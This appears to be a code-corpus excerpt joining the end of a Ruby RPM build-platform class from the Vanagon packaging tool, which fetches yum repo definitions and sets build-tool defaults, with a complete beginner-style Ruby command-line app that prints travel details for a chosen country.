commands << "curl -o '/etc/yum.repos.d/#{reponame}' '#{definition}'"
end
end
end
commands
end
# Pass in a packaging override. This will get added to the spec file, and
# is a good way to pass in arbitrary `%_define` or `%_global`
#
# @param project
# @param var the string that should be added to the build script.
def package_override(project, var)
project.package_overrides << var
end
# Constructor. Sets up some defaults for the rpm platform and calls the parent constructor
#
# @param name [String] name of the platform
# @return [Vanagon::Platform::RPM] the rpm derived platform with the given name
def initialize(name)
@name = name
@make ||= "/usr/bin/make"
@tar ||= "tar"
@patch ||= "/usr/bin/patch"
@num_cores ||= "/bin/grep -c 'processor' /proc/cpuinfo"
@rpmbuild ||= "/usr/bin/rpmbuild"
super(name)
end
end
end
end
| 44.216216 | 205 | 0.628158 |
280518d9110688bebc90eb9a319d0402507952d1 | 1,958 | require 'pry'
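# Command-line interface that greets the user, lists countries fetched via the
# API class, and prints travel details (weather, language, currency, vaccines)
# for the chosen country.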
class CLI
attr_accessor :user
def greeting
puts "Welcome To Your Journy!"
puts "***********************"
puts " Please enter your fullname"
@user = gets.chomp.strip.upcase
puts " "
puts "Welcome #{@user}: If you are intrested in traveling the world enter 'travel'"
puts " "
puts "If you are not intrsted in traveling enter 'exit'"
API.fetch_api
info
end
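  # Dispatches on the user's input: 'travel' shows the country list,
  # 'exit' logs out, and anything else re-prompts.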
def info
input = gets.strip.downcase
if input == "travel"
travel_list
info
elsif input == "exit"
log_out
else
invalid_entry
end
end
def travel_list
Travel.all.each_with_index do |travel, index|
puts "#{index + 1}. #{travel.name}"
end
puts " "
puts "Please choose the countrie you would like to get information about "
puts "...Where would you like to travel to:"
puts " "
input = gets.strip.downcase
travel_selection(input)
end
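  # Looks up the chosen country, refreshes its data, and prints the details
  # currently surfaced (weather, language, currency, vaccines).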
def travel_selection(travel)
countrie = Travel.find_by_name(travel)
countrie.update
#puts "Url: #{countrie.url}"
#puts "advise: #{countrie.advise}"
#puts "Health: #{countrie.health}"
puts "Weather: #{countrie.weather}"
puts "Language: #{countrie.language}"
puts "Currency: #{countrie.currency}"
puts "Vaccines: #{countrie.vaccines}"
# puts "Visa_requirements: #{countrie.visa_requirements}"
#puts "Electric_sockets: #{countrie.electric_sockets}"
end
def invalid_entry
puts "Invalid Entry"
puts "If u would like to continue please enter the correct information"
info
end
def log_out
puts " "
puts "You are know logged out"
puts "Thank you for using thise application"
puts " "
puts "Goodbye"
end
end | 27.577465 | 91 | 0.565373 |